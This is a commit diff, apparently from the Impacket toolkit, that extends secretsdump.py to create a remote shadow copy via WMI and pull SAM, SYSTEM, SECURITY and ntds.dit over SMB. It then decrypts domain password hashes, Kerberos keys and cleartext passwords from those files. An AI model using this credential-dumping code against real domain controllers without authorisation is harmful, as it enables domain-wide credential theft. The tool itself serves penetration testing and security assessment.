[SECRETSDUMP] - NTDS.dit Dumping with Shadow Snapshot Method via WMI (No Code Execution) (#2021)

* Implemented also NTDS.dit download using ShadowSnapshot method via WMI

* Added some debug msgs

* Finished, but error when decrypting. Also with other methods. Found bug?

* Finished, but error when decrypting. Also with other methods. Found bug?

* Adding checks for correct options usage. #2021 (review)

---------

Co-authored-by: Peter Gabaldon <[email protected]>

Author: PeterGabaldon

examples/secretsdump.py

@@ -116,9 +116,10 @@ def __init__(self, remoteName, username='', password='', domain='', options=None
         self.__resumeFileName = options.resumefile
         self.__canProcessSAMLSA = True
         self.__kdcHost = options.dc_ip
-        self.__remoteSSMethod = options.use_remoteSSMethod
-        self.__remoteSSMethodRemoteVolume = options.remoteSS_remote_volume
-        self.__remoteSSMethodDownloadPath = options.remoteSS_local_path
+        self.__remoteSSWMI = options.use_remoteSSWMI
+        self.__remoteSSWMINTDS = options.use_remoteSSWMI_NTDS
+        self.__remoteSSMethodWMIRemoteVolume = options.remoteSSWMI_remote_volume
+        self.__remoteSSMethodWMIDownloadPath = options.remoteSSWMI_local_path
         self.__options = options
 
         if options.hashes is not None:
@@ -174,9 +175,10 @@ def ldapConnect(self):
 
     def dump(self):
         try:
-            # Almost like LOCAL but create a Shadow Snapshot at target and download SAM, SYSTEM and SECURITY from the SS.
+            # Almost like LOCAL but create (and deletes it after finishing) a Shadow Snapshot at target and download SAM, SYSTEM and SECURITY from the SS. No Code Execution.
+            # If specified, NTDS will be also downloaded and parsed (no code execution needed, in contrast to vssadmin method). Use it when targeting a DC.
             # Then, parse locally
-            if self.__remoteSSMethod:
+            if self.__remoteSSWMI:
                 self.__isRemote = False
                 self.__useVSSMethod = True
                 try:
@@ -191,16 +193,15 @@ def dump(self):
                     else:
                         raise
 
-                # TESTING C:\\
-                # Should specify Volume with argument
                 self.__remoteOps = RemoteOperations(self.__smbConnection, self.__doKerberos, self.__kdcHost,
                                                     self.__ldapConnection)
                 self.__remoteOps.setExecMethod(self.__options.exec_method)
-                sam_path, system_path, security_path = self.__remoteOps.createSSandDownload(self.__remoteSSMethodRemoteVolume,
-                                                                                            self.__remoteSSMethodDownloadPath)
+                sam_path, system_path, security_path, *ntds_path = self.__remoteOps.createSSandDownloadWMI(self.__remoteSSMethodWMIRemoteVolume,
+                                                                                                           self.__remoteSSMethodWMIDownloadPath, self.__remoteSSWMINTDS)
                 self.__samHive = sam_path
                 self.__systemHive = system_path
                 self.__securityHive = security_path
+                self.__ntdsFile = ntds_path[0] if ntds_path else None
 
                 localOperations = LocalOperations(self.__systemHive)
                 bootKey = localOperations.getBootKey()
@@ -316,7 +317,7 @@ def dump(self):
 
                 self.__NTDSHashes = NTDSHashes(NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history,
                                                noLMHash=self.__noLMHash, remoteOps=self.__remoteOps,
-                                               useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM,
+                                               useVSSMethod=self.__useVSSMethod, remoteSSMethodWMINTDS=self.__remoteSSWMINTDS, justNTLM=self.__justDCNTLM,
                                                pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName,
                                                outputFileName=self.__outputFileName, justUser=self.__justUser,
                                                skipUser=self.__skipUser, ldapFilter=self.__ldapFilter,
@@ -418,11 +419,13 @@ def cleanup(self):
                         help='Use the Kerb-Key-List method instead of default DRSUAPI')
     parser.add_argument('-exec-method', choices=['smbexec', 'wmiexec', 'mmcexec'], nargs='?', default='smbexec', help='Remote exec '
                         'method to use at target (only when using -use-vss). Default: smbexec')
-    parser.add_argument('-use-remoteSSMethod', action='store_true',
+    parser.add_argument('-use-remoteSSWMI', action='store_true',
                         help='Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse locally')
-    parser.add_argument('-remoteSS-remote-volume', action='store', default='C:\\',
-                        help='Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY')
-    parser.add_argument('-remoteSS-local-path', action='store', default='.',
+    parser.add_argument('-use-remoteSSWMI-NTDS', action='store_true',
+                        help='Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a DC. IMPORTANT: this flag only works when also using -use-remoteSSWMI')
+    parser.add_argument('-remoteSSWMI-remote-volume', action='store', default='C:\\',
+                        help='Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to C:\\')
+    parser.add_argument('-remoteSSWMI-local-path', action='store', default='.',
                         help='Path where download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path')
 
     group = parser.add_argument_group('display options')
@@ -473,8 +476,8 @@ def cleanup(self):
     domain, username, password, remoteName = parse_target(options.target)
 
     if options.just_dc_user is not None or options.ldapfilter is not None:
-        if options.use_vss is True:
-            logging.error('-just-dc-user switch is not supported in VSS mode')
+        if options.use_vss is True or options.use_remoteSSWMI_NTDS is True:
+            logging.error('-just-dc-user switch is not supported in VSS mode nor WMI VSS mode')
             sys.exit(1)
         elif options.resumefile is not None:
             logging.error('resuming a previous NTDS.DIT dump session not compatible with -just-dc-user switch')
@@ -486,8 +489,12 @@ def cleanup(self):
             # Having this switch on implies not asking for anything else.
             options.just_dc = True
 
-    if options.use_vss is True and options.resumefile is not None:
-        logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS mode')
+    if (options.use_vss is True or options.use_remoteSSWMI_NTDS is True) and options.resumefile is not None:
+        logging.error('resuming a previous NTDS.DIT dump session is not supported in VSS mode nor WMI VSS mode')
+        sys.exit(1)
+
+    if options.use_remoteSSWMI_NTDS is True and options.use_remoteSSWMI is not True:
+        logging.error('-use-remoteSSWMI-NTDS requires -use-remoteSSWMI to be specified')
         sys.exit(1)
 
     if options.use_keylist is True and (options.rodcNo is None or options.rodcKey is None):

impacket/examples/secretsdump.py

@@ -1282,7 +1282,7 @@ def saveNTDS(self):
 
         return remoteFileName
 
-    def createSSandDownload(self, volume, localPath):
+    def createSSandDownloadWMI(self, volume, localPath, NTDS=False):
         LOG.info('Creating SS')
         ssID = self.__wmiCreateShadow(volume)
         LOG.info('Getting SMB equivalent PATH to access remotely the SS')
@@ -1295,7 +1295,12 @@ def createSSandDownload(self, volume, localPath):
                  ('%s/SYSTEM' % localPath, '%s\\System32\\config\\SYSTEM' % gmtSMBPath),
                  ('%s/SECURITY' % localPath, '%s\\System32\\config\\SECURITY' % gmtSMBPath)]
 
+        if NTDS:
+            LOG.debug('Adding NTDS Path')
+            paths.append(('%s/ntds.dit' % localPath, '%s\\NTDS\\ntds.dit' % gmtSMBPath))
+
         for p in paths:
+            LOG.debug("Downloading Remote path: %s to -> %s" % (p[1], p[0]))
             with open(p[0], 'wb') as local_file:
                 self.__smbConnection.getFile('ADMIN$', p[1], local_file.write)
 
@@ -2389,7 +2394,7 @@ class CRYPTED_BLOB(Structure):
         )
 
     def __init__(self, ntdsFile, bootKey, isRemote=False, history=False, noLMHash=True, remoteOps=None,
-                 useVSSMethod=False, justNTLM=False, pwdLastSet=False, resumeSession=None, outputFileName=None,
+                 useVSSMethod=False, remoteSSMethodWMINTDS=False, justNTLM=False, pwdLastSet=False, resumeSession=None, outputFileName=None,
                  justUser=None, skipUser=None,ldapFilter=None, printUserStatus=False,
                  perSecretCallback = lambda secretType, secret : _print_helper(secret),
                  resumeSessionMgr=ResumeSessionMgrInFile):
@@ -2398,6 +2403,7 @@ def __init__(self, ntdsFile, bootKey, isRemote=False, history=False, noLMHash=Tr
         self.__history = history
         self.__noLMHash = noLMHash
         self.__useVSSMethod = useVSSMethod
+        self.__remoteSSMethodWMINTDS = remoteSSMethodWMINTDS
         self.__remoteOps = remoteOps
         self.__pwdLastSet = pwdLastSet
         self.__printUserStatus = printUserStatus
@@ -2540,7 +2546,7 @@ def __decryptSupplementalInfo(self, record, prefixTable=None, keysFile=None, cle
         # This is based on [MS-SAMR] 2.2.10 Supplemental Credentials Structures
         haveInfo = False
         LOG.debug('Entering NTDSHashes.__decryptSupplementalInfo')
-        if self.__useVSSMethod is True:
+        if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
             if record[self.NAME_TO_INTERNAL['supplementalCredentials']] is not None:
                 if len(unhexlify(record[self.NAME_TO_INTERNAL['supplementalCredentials']])) > 24:
                     if record[self.NAME_TO_INTERNAL['userPrincipalName']] is not None:
@@ -2656,7 +2662,7 @@ def __decryptSupplementalInfo(self, record, prefixTable=None, keysFile=None, cle
 
     def __decryptHash(self, record, prefixTable=None, outputFile=None):
         LOG.debug('Entering NTDSHashes.__decryptHash')
-        if self.__useVSSMethod is True:
+        if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
             LOG.debug('Decrypting hash for user: %s' % record[self.NAME_TO_INTERNAL['name']])
 
             sid = SAMR_RPC_SID(unhexlify(record[self.NAME_TO_INTERNAL['objectSid']]))
@@ -2905,9 +2911,9 @@ def dump(self):
             else:
                 skipUsers = self.__skipUser.split(',')
 
-        if self.__useVSSMethod is True:
+        if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
             if self.__NTDS is None:
-                # No NTDS.dit file provided and were asked to use VSS
+                # No NTDS.dit file provided and were asked to use VSS or Shadow Snapshot Method via WMI
                 return
         else:
             if self.__NTDS is None:
@@ -2946,7 +2952,7 @@ def dump(self):
                     clearTextOutputFile = openFile(self.__outputFileName+'.ntds.cleartext',mode)
 
             LOG.info('Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)')
-            if self.__useVSSMethod:
+            if self.__useVSSMethod or self.__remoteSSMethodWMINTDS:
                 # We start getting rows from the table aiming at reaching
                 # the pekList. If we find users records we stored them
                 # in a temp list for later process.
@@ -3178,7 +3184,7 @@ def dump(self):
             LOG.debug("Finished processing and printing user's hashes, now printing supplemental information")
             # Now we'll print the Kerberos keys. So we don't mix things up in the output.
             if len(self.__kerberosKeys) > 0:
-                if self.__useVSSMethod is True:
+                if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
                     LOG.info('Kerberos keys from %s ' % self.__NTDS)
                 else:
                     LOG.info('Kerberos keys grabbed')
@@ -3188,7 +3194,7 @@ def dump(self):
 
             # And finally the cleartext pwds
             if len(self.__clearTextPwds) > 0:
-                if self.__useVSSMethod is True:
+                if self.__useVSSMethod is True or self.__remoteSSMethodWMINTDS is True:
                     LOG.info('ClearText password from %s ' % self.__NTDS)
                 else:
                     LOG.info('ClearText passwords grabbed')